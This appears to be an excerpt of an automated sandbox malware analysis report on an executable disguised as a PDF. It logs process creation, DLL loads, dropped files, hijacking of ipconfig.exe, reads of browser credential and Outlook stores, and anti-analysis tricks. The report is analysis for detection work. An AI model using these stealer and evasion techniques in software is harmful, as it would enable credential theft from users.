        Source: C:\Users\user\Desktop\-pdf.bat.exeFile created: C:\Users\user\AppData\Local\AnvilledJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsx5EF9.tmpJump to behavior
        Source: -pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\-pdf.bat.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: ipconfig.exe, 00000004.00000002.42209827206.0000000008549000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.0000000008540000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
        Source: ipconfig.exe, 00000004.00000003.38580690753.000000000363E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38584047813.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38580912535.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42206145424.000000000365E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: ipconfig.exe, 00000004.00000003.38589208982.000000000859E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42209827206.00000000085AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: -pdf.bat.exeReversingLabs: Detection: 23%
        Source: -pdf.bat.exeVirustotal: Detection: 26%
        Source: C:\Users\user\Desktop\-pdf.bat.exeFile read: C:\Users\user\Desktop\-pdf.bat.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\-pdf.bat.exe "C:\Users\user\Desktop\-pdf.bat.exe"
        Source: C:\Users\user\Desktop\-pdf.bat.exeProcess created: C:\Users\user\Desktop\-pdf.bat.exe "C:\Users\user\Desktop\-pdf.bat.exe"
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Users\user\Desktop\-pdf.bat.exeProcess created: C:\Users\user\Desktop\-pdf.bat.exe "C:\Users\user\Desktop\-pdf.bat.exe"Jump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: -pdf.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ipconfig.pdb source: -pdf.bat.exe, 00000002.00000003.38109319687.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38109262799.0000000002539000.00000004.00000020.00020000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000003.38079580711.0000000000F45000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ipconfig.pdbGCTL source: -pdf.bat.exe, 00000002.00000003.38109319687.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38109262799.0000000002539000.00000004.00000020.00020000.00000000.sdmp, ijDRAEBvXKu.exe, 00000003.00000003.38079580711.0000000000F45000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ijDRAEBvXKu.exe, 00000003.00000002.42752421981.000000000050E000.00000002.00000001.01000000.00000009.sdmp
        Source: Binary string: wntdll.pdbUGP source: -pdf.bat.exe, 00000002.00000003.38051427415.000000003229A000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38054661347.0000000032447000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38140495521.0000000003885000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38143709731.0000000003A32000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003D0D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003BE0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: -pdf.bat.exe, -pdf.bat.exe, 00000002.00000003.38051427415.000000003229A000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38054661347.0000000032447000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38140495521.0000000003885000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38143709731.0000000003A32000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003D0D000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42207548894.0000000003BE0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_70312351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70312351
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326208CD push ecx; mov dword ptr [esp], ecx2_2_326208D6
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_01032112 push ds; ret 3_2_01032113
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_01042158 push 4FD2B7E7h; iretd 3_2_0104216C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0104215B push 4FD2B7E7h; iretd 3_2_0104216C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_01042173 push 4FD2B7E7h; iretd 3_2_0104216C
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103C1D0 push edx; retf 3_2_0103C1E1
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103F826 push ebx; ret 3_2_0103F82A
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103FCA6 push esi; ret 3_2_0103FCA7
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103F7F8 push FFFFFFD8h; iretd 3_2_0103F7FA
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103DE7B push edi; retf 3_2_0103DE86
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103DE7A push edi; retf 3_2_0103DE86
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103D6FA push eax; ret 3_2_0103D6FB

        Persistence and Installation Behavior

        barindex
        Uses ipconfig to lookup or modify the Windows network settings
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
        Source: C:\Users\user\Desktop\-pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Users\user\Desktop\-pdf.bat.exeAPI/Special instruction interceptor: Address: 5E9CC52
        Source: C:\Users\user\Desktop\-pdf.bat.exeAPI/Special instruction interceptor: Address: 1D0CC52
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 rdtsc 2_2_32661763
        Source: C:\Windows\SysWOW64\ipconfig.exeWindow / User API: threadDelayed 9285Jump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\-pdf.bat.exeEvaded block: after key decisiongraph_0-4397
        Source: C:\Users\user\Desktop\-pdf.bat.exeAPI coverage: 0.3 %
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe TID: 4688Thread sleep time: -80000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2788Thread sleep count: 172 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2788Thread sleep time: -344000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2788Thread sleep count: 9285 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exe TID: 2788Thread sleep time: -18570000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_0040682E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_0040682E
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_004066E4 FindFirstFileW,FindClose,0_2_004066E4
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42753427444.0000000000F49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052348509.00000000024E0000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052027956.00000000024E0000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142698018.00000000024E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX?L
        Source: ipconfig.exe, 00000004.00000002.42206145424.00000000035E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\-pdf.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4289
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32661763 rdtsc 2_2_32661763
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00405B41 DeleteFileW,GetTempPathW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LdrInitializeThunk,LoadImageW,RegisterClassW,RegisterClassW,LdrInitializeThunk,SystemParametersInfoW,LdrInitializeThunk,LdrInitializeThunk,CreateWindowExW,ShowWindow,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW,LdrInitializeThunk,LdrInitializeThunk,0_2_00405B41
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_70312351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70312351
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B273 mov eax, dword ptr fs:[00000030h]2_2_3261B273
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B273 mov eax, dword ptr fs:[00000030h]2_2_3261B273
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261B273 mov eax, dword ptr fs:[00000030h]2_2_3261B273
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DD270 mov eax, dword ptr fs:[00000030h]2_2_326DD270
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DF247 mov eax, dword ptr fs:[00000030h]2_2_326DF247
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264F24A mov eax, dword ptr fs:[00000030h]2_2_3264F24A
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326A0227 mov eax, dword ptr fs:[00000030h]2_2_326A0227
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326A0227 mov eax, dword ptr fs:[00000030h]2_2_326A0227
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326A0227 mov eax, dword ptr fs:[00000030h]2_2_326A0227
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265A22B mov eax, dword ptr fs:[00000030h]2_2_3265A22B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265A22B mov eax, dword ptr fs:[00000030h]2_2_3265A22B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3265A22B mov eax, dword ptr fs:[00000030h]2_2_3265A22B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32640230 mov ecx, dword ptr fs:[00000030h]2_2_32640230
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261A200 mov eax, dword ptr fs:[00000030h]2_2_3261A200
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261821B mov eax, dword ptr fs:[00000030h]2_2_3261821B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AB214 mov eax, dword ptr fs:[00000030h]2_2_326AB214
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326AB214 mov eax, dword ptr fs:[00000030h]2_2_326AB214
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326172E0 mov eax, dword ptr fs:[00000030h]2_2_326172E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326282E0 mov eax, dword ptr fs:[00000030h]2_2_326282E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326282E0 mov eax, dword ptr fs:[00000030h]2_2_326282E0
